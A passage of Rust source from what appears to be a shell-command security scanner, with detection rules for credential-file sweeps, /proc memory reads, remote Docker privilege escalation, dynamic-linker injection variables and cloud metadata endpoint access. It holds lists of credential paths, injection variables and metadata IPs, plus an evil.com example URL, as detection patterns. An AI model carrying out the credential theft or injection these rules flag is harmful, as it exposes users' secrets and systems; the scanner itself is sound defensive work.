1121        }
1122    }
1123}
1124
1125fn check_dotfile_overwrite(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1126    for segment in segments {
1127        // Check for redirects to dotfiles
1128        let raw = &segment.raw;
1129        if (raw.contains("> ~/.")
1130            || raw.contains("> $HOME/.")
1131            || raw.contains(">> ~/.")
1132            || raw.contains(">> $HOME/."))
1133            && !raw.contains("> /dev/null")
1134        {
1135            findings.push(Finding {
1136                rule_id: RuleId::DotfileOverwrite,
1137                severity: Severity::High,
1138                title: "Dotfile overwrite detected".to_string(),
1139                description: "Command redirects output to a dotfile in the home directory, which could overwrite shell configuration".to_string(),
1140                evidence: vec![Evidence::CommandPattern {
1141                    pattern: "redirect to dotfile".to_string(),
1142                    matched: redact::redact_shell_assignments(raw),
1143                }],
1144                human_view: None,
1145                agent_view: None,
1146                mitre_id: None,
1147                custom_rule_id: None,
1148            });
1149        }
1150    }
1151}
1152
1153fn check_archive_extract(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1154    for segment in segments {
1155        if let Some(ref cmd) = segment.command {
1156            let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1157            if cmd_base == "tar" || cmd_base == "unzip" || cmd_base == "7z" {
1158                // Check if extracting to a sensitive directory
1159                let raw = &segment.raw;
1160                let sensitive_targets = [
1161                    "-C /",
1162                    "-C ~/",
1163                    "-C $HOME/",
1164                    "-d /",
1165                    "-d ~/",
1166                    "-d $HOME/",
1167                    "> ~/.",
1168                    ">> ~/.",
1169                ];
1170                for target in &sensitive_targets {
1171                    if raw.contains(target) {
1172                        findings.push(Finding {
1173                            rule_id: RuleId::ArchiveExtract,
1174                            severity: Severity::Medium,
1175                            title: "Archive extraction to sensitive path".to_string(),
1176                            description: format!(
1177                                "Archive command '{cmd_base}' extracts to a potentially sensitive location"
1178                            ),
1179                            evidence: vec![Evidence::CommandPattern {
1180                                pattern: "archive extract".to_string(),
1181                                matched: redact::redact_shell_assignments(raw),
1182                            }],
1183                            human_view: None,
1184                            agent_view: None,
1185                mitre_id: None,
1186                custom_rule_id: None,
1187                        });
1188                        return;
1189                    }
1190                }
1191            }
1192        }
1193    }
1194}
1195
1196// ---------------------------------------------------------------------------
1197// Process memory access detection
1198// ---------------------------------------------------------------------------
1199
/// Commands that read file contents — scoped to utilities commonly used
/// for proc memory dumping. Excludes echo/printf (not file readers).
///
/// `check_proc_mem_access` compares the wrapper-resolved command against this list
/// by exact string match; segments running any other command are ignored.
const PROC_MEM_READER_CMDS: &[&str] = &[
    "cat", "dd", "strings", "head", "tail", "xxd", "od", "base64", "hexdump", "less", "more", "cp",
    "grep",
];

/// Matches a `/proc/self/mem` or `/proc/<digits>/mem` path anywhere in a string.
/// The pattern is unanchored; the trailing `\b` keeps longer names such as
/// `/proc/self/meminfo` from matching.
static PROC_MEM_RE: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"/proc/(?:self|\d+)/mem\b").expect("PROC_MEM_RE"));
1209
1210fn check_proc_mem_access(
1211    segments: &[tokenize::Segment],
1212    shell: ShellType,
1213    findings: &mut Vec<Finding>,
1214) {
1215    for seg in segments {
1216        let effective_seg =
1217            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1218        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1219        if !PROC_MEM_READER_CMDS.contains(&resolved_cmd.as_str()) {
1220            continue;
1221        }
1222
1223        for arg in &effective_seg.args {
1224            let normalized = normalize_shell_token(arg, shell);
1225            if PROC_MEM_RE.is_match(&normalized) {
1226                findings.push(Finding {
1227                    rule_id: RuleId::ProcMemAccess,
1228                    severity: Severity::High,
1229                    title: "Process memory access detected".to_string(),
1230                    description: "Command reads from /proc/*/mem, which can dump process memory \
1231                                  contents including secrets and credentials"
1232                        .to_string(),
1233                    evidence: vec![Evidence::CommandPattern {
1234                        pattern: "proc memory read".to_string(),
1235                        matched: redact::redact_shell_assignments(&seg.raw),
1236                    }],
1237                    human_view: None,
1238                    agent_view: None,
1239                    mitre_id: None,
1240                    custom_rule_id: None,
1241                });
1242                return;
1243            }
1244            // dd-style: if=/proc/self/mem
1245            if let Some(val) = normalized.strip_prefix("if=") {
1246                if PROC_MEM_RE.is_match(val) {
1247                    findings.push(Finding {
1248                        rule_id: RuleId::ProcMemAccess,
1249                        severity: Severity::High,
1250                        title: "Process memory access detected".to_string(),
1251                        description: "Command reads from /proc/*/mem via dd, which can dump \
1252                                      process memory contents including secrets and credentials"
1253                            .to_string(),
1254                        evidence: vec![Evidence::CommandPattern {
1255                            pattern: "proc memory read".to_string(),
1256                            matched: redact::redact_shell_assignments(&seg.raw),
1257                        }],
1258                        human_view: None,
1259                        agent_view: None,
1260                        mitre_id: None,
1261                        custom_rule_id: None,
1262                    });
1263                    return;
1264                }
1265            }
1266        }
1267    }
1268}
1269
1270// ---------------------------------------------------------------------------
1271// Docker remote privilege escalation detection
1272// ---------------------------------------------------------------------------
1273
1274fn check_docker_remote_privesc(
1275    segments: &[tokenize::Segment],
1276    shell: ShellType,
1277    findings: &mut Vec<Finding>,
1278) {
1279    for seg in segments {
1280        let effective_seg =
1281            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1282        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1283        if resolved_cmd != "docker" && resolved_cmd != "podman" {
1284            continue;
1285        }
1286
1287        let norm_args: Vec<String> = effective_seg
1288            .args
1289            .iter()
1290            .map(|a| normalize_shell_token(a, shell))
1291            .collect();
1292
1293        let has_remote = detect_docker_remote_host(&norm_args, &effective_seg, shell);
1294        if !has_remote {
1295            continue;
1296        }
1297
1298        let has_priv = norm_args.iter().any(|a| a == "--privileged");
1299        let has_root_mount = has_docker_root_mount(&norm_args);
1300
1301        if has_priv || has_root_mount {
1302            findings.push(Finding {
1303                rule_id: RuleId::DockerRemotePrivEsc,
1304                severity: Severity::Critical,
1305                title: "Docker remote privileged escalation detected".to_string(),
1306                description: "Command targets a remote Docker daemon with privileged access or \
1307                              host root mount, enabling full host compromise"
1308                    .to_string(),
1309                evidence: vec![Evidence::CommandPattern {
1310                    pattern: "docker remote privesc".to_string(),
1311                    matched: redact::redact_shell_assignments(&seg.raw),
1312                }],
1313                human_view: None,
1314                agent_view: None,
1315                mitre_id: None,
1316                custom_rule_id: None,
1317            });
1318            return;
1319        }
1320    }
1321}
1322
1323fn detect_docker_remote_host(
1324    norm_args: &[String],
1325    seg: &tokenize::Segment,
1326    shell: ShellType,
1327) -> bool {
1328    for (i, arg) in norm_args.iter().enumerate() {
1329        let lower = arg.to_lowercase();
1330        // -H=tcp://... or --host=tcp://... (combined form, quotes already stripped)
1331        if arg.starts_with("-H=tcp://") || lower.starts_with("--host=tcp://") {
1332            return true;
1333        }
1334        // -H tcp://... or --host tcp://... (flag + next arg)
1335        if arg == "-H" || lower == "--host" {
1336            if let Some(next) = norm_args.get(i + 1) {
1337                if next.starts_with("tcp://") {
1338                    return true;
1339                }
1340            }
1341        }
1342    }
1343    // DOCKER_HOST=tcp://... as env prefix (Path A: direct leading env assignment)
1344    for (name, value) in tokenize::leading_env_assignments(&seg.raw) {
1345        if name.eq_ignore_ascii_case("DOCKER_HOST") {
1346            let clean_val = normalize_shell_token(&value, shell);
1347            if clean_val.starts_with("tcp://") {
1348                return true;
1349            }
1350        }
1351    }
1352    // Path B: env wrapper form (env DOCKER_HOST=tcp://... docker ...)
1353    // Skip DOCKER_HOST= args that follow -e/--env (those set container env, not client remote)
1354    let args = &seg.args;
1355    for (i, arg) in args.iter().enumerate() {
1356        let norm = normalize_shell_token(arg, shell);
1357        if let Some(val) = norm
1358            .strip_prefix("DOCKER_HOST=")
1359            .or_else(|| norm.strip_prefix("docker_host="))
1360        {
1361            // Check if this arg is a container -e/--env value (not client config)
1362            if i > 0 {
1363                let prev = normalize_shell_token(&args[i - 1], shell);
1364                let prev_lower = prev.to_lowercase();
1365                if prev_lower == "-e" || prev_lower == "--env" {
1366                    continue; // container env, not client remote
1367                }
1368            }
1369            let clean_val = normalize_shell_token(val, shell);
1370            if clean_val.starts_with("tcp://") {
1371                return true;
1372            }
1373        }
1374    }
1375    false
1376}
1377
/// Report whether the (already normalized) arguments bind-mount the host root `/`.
///
/// Recognised spellings:
/// * `-v /:/…` and `--volume /:/…` (flag followed by the value),
/// * `-v=/:/…` and `--volume=/:/…`,
/// * `--mount …` / `--mount=…` whose spec names `/` as `src` or `source`.
///
/// Flag names are compared case-insensitively. The value of a separated `--mount` is
/// inspected as written, while an attached `--mount=` value is inspected lower-cased.
fn has_docker_root_mount(norm_args: &[String]) -> bool {
    /// True when a `--mount` spec has `/` as its source, either followed by another
    /// field or at the very end of the spec.
    fn mount_spec_binds_root(spec: &str) -> bool {
        spec.contains("src=/,")
            || spec.contains("source=/,")
            || spec.ends_with("src=/")
            || spec.ends_with("source=/")
    }

    norm_args.iter().enumerate().any(|(pos, arg)| {
        let flag = arg.to_lowercase();
        let following = norm_args.get(pos + 1).map(String::as_str);

        match flag.as_str() {
            // -v /:/... or --volume /:/...
            "-v" | "--volume" => following.map_or(false, |value| value.starts_with("/:/")),
            // --mount type=bind,src=/,dst=/...
            "--mount" => following.map_or(false, mount_spec_binds_root),
            // Attached `flag=value` spellings.
            attached => {
                attached.starts_with("-v=/:/")
                    || attached.starts_with("--volume=/:/")
                    || attached
                        .strip_prefix("--mount=")
                        .map_or(false, mount_spec_binds_root)
            }
        }
    })
}
1411
1412// ---------------------------------------------------------------------------
1413// Credential file sweep detection
1414// ---------------------------------------------------------------------------
1415
/// Path fragments identifying credential files and directories.
///
/// `check_credential_file_sweep` looks for each fragment as a substring of the
/// space-joined, normalized arguments. Every fragment starts at the `/` preceding the
/// dot-entry, so the part of the path before it does not affect matching.
const CREDENTIAL_PATHS: &[&str] = &[
    "/.ssh/id_",
    "/.ssh/authorized_keys",
    "/.aws/credentials",
    "/.aws/config",
    "/.docker/config.json",
    "/.kube/config",
    "/.config/gcloud/",
    "/.npmrc",
    "/.pypirc",
    "/.netrc",
    "/.gnupg/",
    "/.config/gh/",
    "/.git-credentials",
];

/// Command names that read, copy, search or archive files.
///
/// `check_credential_file_sweep` only examines segments whose wrapper-resolved
/// command is an exact member of this list.
const READ_ARCHIVE_VERBS: &[&str] = &[
    "cat", "tar", "zip", "gzip", "strings", "head", "tail", "base64", "xxd", "dd", "cp", "find",
    "xargs",
];
1436
1437fn check_credential_file_sweep(
1438    segments: &[tokenize::Segment],
1439    shell: ShellType,
1440    context: ScanContext,
1441    findings: &mut Vec<Finding>,
1442) {
1443    if context != ScanContext::Exec {
1444        return;
1445    }
1446
1447    for seg in segments {
1448        let effective_seg =
1449            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1450        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1451        if !READ_ARCHIVE_VERBS.contains(&resolved_cmd.as_str()) {
1452            continue;
1453        }
1454
1455        let norm_args: Vec<String> = effective_seg
1456            .args
1457            .iter()
1458            .map(|a| normalize_shell_token(a, shell))
1459            .collect();
1460        let seg_text = norm_args.join(" ");
1461        let matched_count = CREDENTIAL_PATHS
1462            .iter()
1463            .filter(|p| seg_text.contains(**p))
1464            .count();
1465
1466        if matched_count >= 2 {
1467            findings.push(Finding {
1468                rule_id: RuleId::CredentialFileSweep,
1469                severity: Severity::Medium,
1470                title: "Multiple credential files accessed".to_string(),
1471                description: format!(
1472                    "Command accesses {matched_count} known credential file paths in a single \
1473                     invocation, which may indicate credential harvesting"
1474                ),
1475                evidence: vec![Evidence::CommandPattern {
1476                    pattern: "credential file sweep".to_string(),
1477                    matched: redact::redact_shell_assignments(&seg.raw),
1478                }],
1479                human_view: None,
1480                agent_view: None,
1481                mitre_id: None,
1482                custom_rule_id: None,
1483            });
1484            return;
1485        }
1486    }
1487}
1488
1489// ---------------------------------------------------------------------------
1490// Phase 8: Dangerous environment variable detection
1491// ---------------------------------------------------------------------------
1492
/// Environment variables that enable arbitrary code injection via dynamic linker.
///
/// Entries are upper-case: `classify_env_var` upper-cases the candidate name before
/// looking it up here.
const CODE_INJECTION_VARS: &[&str] = &[
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    "LD_AUDIT",
    "DYLD_INSERT_LIBRARIES",
    "DYLD_LIBRARY_PATH",
];

/// Environment variables that cause arbitrary script execution at shell startup.
///
/// Looked up by `classify_env_var` after the code-injection list.
const SHELL_INJECTION_VARS: &[&str] = &["BASH_ENV", "ENV", "PROMPT_COMMAND"];

/// Environment variables that hijack interpreter module/library search paths.
///
/// Looked up by `classify_env_var` after the shell-injection list.
const INTERPRETER_HIJACK_VARS: &[&str] = &["PYTHONPATH", "NODE_OPTIONS", "RUBYLIB", "PERL5LIB"];
1507
1508/// Sensitive credential variable names that should not be exported in commands.
1509use super::shared::SENSITIVE_KEY_VARS;
1510
1511fn classify_env_var(name: &str) -> Option<(RuleId, Severity, &'static str, &'static str)> {
1512    let name_upper = name.to_ascii_uppercase();
1513    let name = name_upper.as_str();
1514    if CODE_INJECTION_VARS.contains(&name) {
1515        Some((
1516            RuleId::CodeInjectionEnv,
1517            Severity::Critical,
1518            "Code injection environment variable",
1519            "can inject shared libraries into all processes, enabling arbitrary code execution",
1520        ))
1521    } else if SHELL_INJECTION_VARS.contains(&name) {
1522        Some((
1523            RuleId::ShellInjectionEnv,
1524            Severity::Critical,
1525            "Shell injection environment variable",
1526            "can cause arbitrary script execution at shell startup",
1527        ))
1528    } else if INTERPRETER_HIJACK_VARS.contains(&name) {
1529        Some((
1530            RuleId::InterpreterHijackEnv,
1531            Severity::High,
1532            "Interpreter hijack environment variable",
1533            "can hijack the interpreter's module/library search path",
1534        ))
1535    } else if SENSITIVE_KEY_VARS.contains(&name) {
1536        Some((
1537            RuleId::SensitiveEnvExport,
1538            Severity::High,
1539            "Sensitive credential exported",
1540            "exposes a sensitive credential that may be logged in shell history",
1541        ))
1542    } else {
1543        None
1544    }
1545}
1546
/// Cargo flags that take their value from the following token when written in
/// separated form (`--config foo` rather than `--config=foo`).
const CARGO_VALUE_FLAGS: &[&str] = &[
    "-Z",
    "-C",
    "--config",
    "--manifest-path",
    "--color",
    "--target-dir",
    "--target",
];

/// Report whether the cargo subcommand in `args` is `install` or `add`.
///
/// The subcommand is the first token that is not a toolchain spec (`+nightly`), not a
/// flag, and not the value consumed by one of `CARGO_VALUE_FLAGS`. Returns `false`
/// when no subcommand is present or when it is anything else.
fn is_cargo_install_or_add(args: &[String]) -> bool {
    let mut tokens = args.iter().map(String::as_str);

    while let Some(token) = tokens.next() {
        // Toolchain specs (+nightly, +stable).
        if token.starts_with('+') {
            continue;
        }
        // `--flag=value` carries its own value; nothing further to skip.
        if token.starts_with("--") && token.contains('=') {
            continue;
        }
        // Separated value flag: discard the value token too, whatever it looks like.
        if CARGO_VALUE_FLAGS.contains(&token) {
            tokens.next();
            continue;
        }
        // Any other flag (--locked, -v, ...).
        if token.starts_with('-') {
            continue;
        }
        // First positional token is the subcommand.
        return matches!(token, "install" | "add");
    }
    false
}
1589
1590/// Warn when `cargo install/add` is used and no supply-chain audit directory exists.
1591fn check_vet_not_configured(
1592    segments: &[tokenize::Segment],
1593    cwd: Option<&str>,
1594    findings: &mut Vec<Finding>,
1595) {
1596    let is_cargo_install = segments.iter().any(|s| {
1597        if let Some(ref cmd) = s.command {
1598            let base = cmd
1599                .rsplit(['/', '\\'])
1600                .next()
1601                .unwrap_or(cmd)
1602                .to_ascii_lowercase();
1603            let base = base.strip_suffix(".exe").unwrap_or(&base);
1604            if base == "cargo" {
1605                return is_cargo_install_or_add(&s.args);
1606            }
1607        }
1608        false
1609    });
1610    if !is_cargo_install {
1611        return;
1612    }
1613
1614    // Check if supply-chain/ config exists relative to the analysis context cwd.
1615    // Require an explicit cwd — without one we cannot reliably check the filesystem.
1616    let cwd = match cwd {
1617        Some(dir) => dir,
1618        None => return,
1619    };
1620    let check_path = std::path::PathBuf::from(cwd).join("supply-chain/config.toml");
1621    if check_path.exists() {
1622        return;
1623    }
1624
1625    findings.push(Finding {
1626        rule_id: RuleId::VetNotConfigured,
1627        severity: Severity::Low,
1628        title: "No supply-chain audit configured".into(),
1629        description: "Consider running `cargo vet init` to enable dependency auditing.".into(),
1630        evidence: vec![],
1631        human_view: None,
1632        agent_view: None,
1633        mitre_id: None,
1634        custom_rule_id: None,
1635    });
1636}
1637
1638fn check_env_var_in_command(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1639    for segment in segments {
1640        let Some(ref cmd) = segment.command else {
1641            continue;
1642        };
1643        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1644
1645        match cmd_base.as_str() {
1646            "export" => {
1647                for arg in &segment.args {
1648                    if let Some((var_name, value)) = arg.split_once('=') {
1649                        emit_env_finding(var_name.trim(), value, findings);
1650                    }
1651                }
1652            }
1653            "env" => {
1654                for arg in &segment.args {
1655                    let trimmed = arg.trim();
1656                    if trimmed.starts_with('-') {
1657                        continue;
1658                    }
1659                    if let Some((var_name, value)) = trimmed.split_once('=') {
1660                        emit_env_finding(var_name.trim(), value, findings);
1661                    }
1662                }
1663            }
1664            "set" => {
1665                // Fish shell: set [-gx] VAR_NAME value...
1666                let mut var_name: Option<&str> = None;
1667                let mut value_parts: Vec<&str> = Vec::new();
1668                for arg in &segment.args {
1669                    let trimmed = arg.trim();
1670                    if trimmed.starts_with('-') && var_name.is_none() {
1671                        continue;
1672                    }
1673                    if var_name.is_none() {
1674                        var_name = Some(trimmed);
1675                    } else {
1676                        value_parts.push(trimmed);
1677                    }
1678                }
1679                if let Some(name) = var_name {
1680                    emit_env_finding(name, &value_parts.join(" "), findings);
1681                }
1682            }
1683            _ => {}
1684        }
1685    }
1686}
1687
1688fn emit_env_finding(var_name: &str, value: &str, findings: &mut Vec<Finding>) {
1689    let Some((rule_id, severity, title_prefix, desc_suffix)) = classify_env_var(var_name) else {
1690        return;
1691    };
1692    let value_preview = redact_env_value(value);
1693    findings.push(Finding {
1694        rule_id,
1695        severity,
1696        title: format!("{title_prefix}: {var_name}"),
1697        description: format!("Setting {var_name} {desc_suffix}"),
1698        evidence: vec![Evidence::EnvVar {
1699            name: var_name.to_string(),
1700            value_preview,
1701        }],
1702        human_view: None,
1703        agent_view: None,
1704        mitre_id: None,
1705        custom_rule_id: None,
1706    });
1707}
1708
/// Returns the placeholder shown in place of an environment-variable value:
/// an empty string when `val` is empty, `"[REDACTED]"` for anything else.
fn redact_env_value(val: &str) -> String {
    let placeholder = if val.is_empty() { "" } else { "[REDACTED]" };
    placeholder.to_string()
}
1716
1717// ---------------------------------------------------------------------------
1718// Phase 9 (free): Network destination detection
1719// ---------------------------------------------------------------------------
1720
1721/// Cloud metadata endpoint IPs that expose instance credentials.
1722const METADATA_ENDPOINTS: &[&str] = &["169.254.169.254", "100.100.100.200"];
1723
1724fn check_host_for_network_issues(arg: &str, findings: &mut Vec<Finding>) {
1725    if let Some(host) = extract_host_from_arg(arg) {
1726        if METADATA_ENDPOINTS.contains(&host.as_str()) {
1727            findings.push(Finding {
1728                rule_id: RuleId::MetadataEndpoint,
1729                severity: Severity::Critical,
1730                title: format!("Cloud metadata endpoint access: {host}"),
1731                description: format!(
1732                    "Command accesses cloud metadata endpoint {host}, \
1733                     which can expose instance credentials and sensitive configuration"
1734                ),
1735                evidence: vec![Evidence::Url {
1736                    raw: arg.to_string(),
1737                }],
1738                human_view: None,
1739                agent_view: None,
1740                mitre_id: None,
1741                custom_rule_id: None,
1742            });
1743        } else if is_private_ip(&host) {
1744            findings.push(Finding {
1745                rule_id: RuleId::PrivateNetworkAccess,
1746                severity: Severity::High,
1747                title: format!("Private network access: {host}"),
1748                description: format!(
1749                    "Command accesses private network address {host}, \
1750                     which may indicate SSRF or lateral movement"
1751                ),
1752                evidence: vec![Evidence::Url {
1753                    raw: arg.to_string(),
1754                }],
1755                human_view: None,
1756                agent_view: None,
1757                mitre_id: None,
1758                custom_rule_id: None,
1759            });
1760        }
1761    }
1762}
1763
1764fn check_network_destination(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1765    for segment in segments {
1766        let Some(ref cmd) = segment.command else {
1767            continue;
1768        };
1769        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1770        if !is_source_command(&cmd_base) {
1771            continue;
1772        }
1773
1774        for arg in &segment.args {
1775            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1776            if trimmed.starts_with('-') {
1777                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1778                if let Some((_flag, value)) = trimmed.split_once('=') {
1779                    check_host_for_network_issues(value, findings);
1780                }
1781                continue;
1782            }
1783
1784            check_host_for_network_issues(trimmed, findings);
1785        }
1786    }
1787}
1788
/// Extract the destination host/IP from a URL-like command argument.
///
/// Two shapes are recognised:
///
/// * **URL with scheme** — `scheme://[userinfo@]host[:port][/path][?query][#frag]`.
///   The authority is cut at the first `/`, `?` or `#` *before* userinfo is
///   removed, and userinfo ends at the *last* `@` of the authority. An `@`
///   that appears in the path or query therefore cannot replace the real host.
/// * **Bare address** — `[userinfo@]IPv4[:port][/path]` or `[IPv6][:port]`
///   (this also covers scp/rsync style `user@10.0.0.5:/path`). Bare hostnames
///   are not returned; only literal IP addresses are.
///
/// When `://` occurs only after a `/`, `?` or `#` (i.e. inside a path or query
/// such as `10.0.0.1/r?u=http://x`), the leading bare address wins; if there is
/// no leading IP address, the host following that `://` is returned.
///
/// Returns `None` when no host can be determined.
fn extract_host_from_arg(arg: &str) -> Option<String> {
    // Characters that terminate the authority component of a URL.
    fn ends_authority(c: char) -> bool {
        matches!(c, '/' | '?' | '#')
    }

    // Leading `[userinfo@]host[:port]` portion of `s`.
    fn authority_of(s: &str) -> &str {
        s.split(ends_authority).next().unwrap_or(s)
    }

    // Drops `userinfo@`; the last `@` is the delimiter because userinfo may
    // itself contain unescaped `@` characters.
    fn strip_userinfo(authority: &str) -> &str {
        authority
            .rfind('@')
            .map_or(authority, |at| &authority[at + 1..])
    }

    // Host of a URL whose scheme and `://` have already been removed.
    fn host_after_scheme(rest: &str) -> Option<String> {
        let host = strip_port(strip_userinfo(authority_of(rest)));
        // Reject empty hosts and malformed bracket syntax.
        if host.is_empty() || host.contains('[') {
            None
        } else {
            Some(host)
        }
    }

    // Literal IPv4 / bracketed IPv6 address at the start of a scheme-less argument.
    fn bare_ip_host(arg: &str) -> Option<String> {
        let host_part = strip_userinfo(authority_of(arg));
        let host = strip_port(host_part);
        if host.parse::<std::net::Ipv4Addr>().is_ok() {
            return Some(host);
        }
        // For `[addr]` input `strip_port` has already removed the brackets.
        if host_part.starts_with('[') && host.parse::<std::net::Ipv6Addr>().is_ok() {
            return Some(host);
        }
        None
    }

    let Some(scheme_end) = arg.find("://") else {
        return bare_ip_host(arg);
    };
    let rest = &arg[scheme_end + 3..];

    if arg[..scheme_end].contains(ends_authority) {
        // The "://" belongs to a path/query, not to a scheme prefix.
        return bare_ip_host(arg).or_else(|| host_after_scheme(rest));
    }
    host_after_scheme(rest)
}

/// Strip the port from a `host[:port]` string, handling IPv6 brackets.
///
/// * `[addr]` or `[addr]:port` yields `addr` (brackets removed).
/// * Input with more than one `:` and no brackets is taken to be an
///   unbracketed IPv6 address and returned unchanged.
/// * A single trailing `:port` is removed when the port is empty (`host:`) or
///   parses as a `u16`; any other suffix is left in place.
fn strip_port(host_port: &str) -> String {
    // Handle IPv6: [::1]:8080
    if host_port.starts_with('[') {
        if let Some(bracket_end) = host_port.find(']') {
            return host_port[1..bracket_end].to_string();
        }
    }
    // Don't strip from unbracketed IPv6 (multiple colons)
    let colon_count = host_port.chars().filter(|&c| c == ':').count();
    if colon_count > 1 {
        return host_port.to_string();
    }
    // IPv4 or hostname with a single colon: strip trailing `:PORT`. An empty
    // port is stripped too, so `host:` and `host` name the same destination.
    if let Some((host, port)) = host_port.rsplit_once(':') {
        if port.is_empty() || port.parse::<u16>().is_ok() {
            return host.to_string();
        }
    }
    host_port.to_string()
}
1853
/// Reports whether `host` is an IPv4 literal inside one of the private ranges
/// `10.0.0.0/8`, `172.16.0.0/12` or `192.168.0.0/16`.
///
/// Loopback (`127.x`) is outside those ranges and therefore yields `false`,
/// as does anything that does not parse as an IPv4 address.
fn is_private_ip(host: &str) -> bool {
    host.parse::<std::net::Ipv4Addr>()
        .map_or(false, |addr| addr.is_private())
}
1868
/// POSIX fetch commands — appropriate for both `tirith run` and `vet` hints.
const POSIX_FETCH_COMMANDS: &[&str] = &["curl", "wget", "http", "https", "xh", "fetch"];

/// PowerShell fetch commands — appropriate for `vet` hints only
/// (`tirith run` doesn't support PowerShell interpreter flows).
const POWERSHELL_FETCH_COMMANDS: &[&str] =
    &["iwr", "irm", "invoke-webrequest", "invoke-restmethod"];

/// Source commands that are not URL-fetching (no vet/tirith-run hints).
const NON_FETCH_SOURCE_COMMANDS: &[&str] = &["scp", "rsync"];

/// True when `cmd` appears in any of the three source-command tables above.
/// The comparison is exact (case-sensitive).
fn is_source_command(cmd: &str) -> bool {
    [
        POSIX_FETCH_COMMANDS,
        POWERSHELL_FETCH_COMMANDS,
        NON_FETCH_SOURCE_COMMANDS,
    ]
    .iter()
    .any(|table| table.contains(&cmd))
}
1885
1886/// All URL-fetching commands (union of POSIX + PowerShell).
1887fn is_url_fetch_command(cmd: &str) -> bool {
1888    POSIX_FETCH_COMMANDS.contains(&cmd) || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1889}
1890
1891/// Whether this fetch source supports `tirith run` hints.
1892/// True only for POSIX fetch commands (`tirith run` is a shell-script runner).
1893fn supports_tirith_run_hint(cmd: &str) -> bool {
1894    POSIX_FETCH_COMMANDS.contains(&cmd)
1895}
1896
/// True when `s` begins with `http://` or `https://`, comparing the scheme
/// ASCII case-insensitively. Works on bytes, so no char-boundary concerns arise.
fn starts_with_http_scheme(s: &str) -> bool {
    let bytes = s.as_bytes();
    ["https://", "http://"].iter().any(|scheme| {
        bytes
            .get(..scheme.len())
            .map_or(false, |head| head.eq_ignore_ascii_case(scheme.as_bytes()))
    })
}
1903
/// Strip control characters from a URL so it cannot inject ANSI escapes,
/// newlines, or other terminal-interpreted sequences into the finding
/// description displayed to the user.
///
/// Removes every character for which `char::is_control` is true: the C0 range
/// (U+0000–U+001F), DEL (U+007F) and the C1 range (U+0080–U+009F). C1 is
/// included because it contains single-character equivalents of escape
/// sequences (e.g. U+009B, CSI). All other characters, including non-ASCII
/// text, are kept in their original order.
fn sanitize_url_for_display(url: &str) -> String {
    url.chars().filter(|c| !c.is_control()).collect()
}
1910
1911/// Extract all URLs from command arguments.
1912fn extract_urls_from_args(args: &[String], shell: ShellType) -> Vec<String> {
1913    let mut urls = Vec::new();
1914    for arg in args {
1915        let normalized = normalize_shell_token(arg.trim(), shell);
1916
1917        if starts_with_http_scheme(&normalized) {
1918            urls.push(normalized);
1919            continue;
1920        }
1921
1922        // Check --flag=<url> forms (e.g., --url=https://...)
1923        if let Some((_, val)) = normalized.split_once('=') {
1924            if starts_with_http_scheme(val) {
1925                urls.push(val.to_string());
1926            }
1927        }
1928    }
1929    urls
1930}
1931
1932/// Check command destination hosts against policy network deny/allow lists.
1933///
1934/// For each source command (curl, wget, etc.), extracts the destination host and
1935/// checks against deny/allow lists. Allow takes precedence (exempts from deny).
1936pub fn check_network_policy(
1937    input: &str,
1938    shell: ShellType,
1939    deny: &[String],
1940    allow: &[String],
1941) -> Vec<Finding> {
1942    if deny.is_empty() {
1943        return Vec::new();
1944    }
1945
1946    let segments = tokenize::tokenize(input, shell);
1947    let mut findings = Vec::new();
1948
1949    for segment in &segments {
1950        let Some(ref cmd) = segment.command else {
1951            continue;
1952        };
1953        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1954        if !is_source_command(&cmd_base) {
1955            continue;
1956        }
1957
1958        for arg in &segment.args {
1959            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1960            if trimmed.starts_with('-') {
1961                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1962                if let Some((_flag, value)) = trimmed.split_once('=') {
1963                    if let Some(host) = extract_host_from_arg(value) {
1964                        if matches_network_list(&host, allow) {
1965                            continue;
1966                        }
1967                        if matches_network_list(&host, deny) {
1968                            findings.push(Finding {
1969                                rule_id: RuleId::CommandNetworkDeny,
1970                                severity: Severity::Critical,
1971                                title: format!("Network destination denied by policy: {host}"),
1972                                description: format!(
1973                                    "Command accesses {host}, which is on the network deny list"
1974                                ),
1975                                evidence: vec![Evidence::Url {
1976                                    raw: value.to_string(),
1977                                }],
1978                                human_view: None,
1979                                agent_view: None,
1980                                mitre_id: None,
1981                                custom_rule_id: None,
1982                            });
1983                            continue;
1984                        }
1985                    }
1986                }
1987                continue;
1988            }
1989
1990            if let Some(host) = extract_host_from_arg(trimmed) {
1991                // Allow list exempts from deny
1992                if matches_network_list(&host, allow) {
1993                    continue;
1994                }
1995                if matches_network_list(&host, deny) {
1996                    findings.push(Finding {
1997                        rule_id: RuleId::CommandNetworkDeny,
1998                        severity: Severity::Critical,
1999                        title: format!("Network destination denied by policy: {host}"),
2000                        description: format!(
2001                            "Command accesses {host}, which is on the network deny list"
2002                        ),
2003                        evidence: vec![Evidence::Url {
2004                            raw: trimmed.to_string(),
2005                        }],
2006                        human_view: None,
2007                        agent_view: None,
2008                        mitre_id: None,
2009                        custom_rule_id: None,
2010                    });
2011                    return findings;
2012                }
2013            }
2014        }
2015    }
2016
2017    findings
2018}
2019
/// Check if a host matches any entry in a network list.
///
/// Per entry, in order:
///
/// 1. **CIDR** — an entry containing `/` is tried as an IPv4 CIDR block
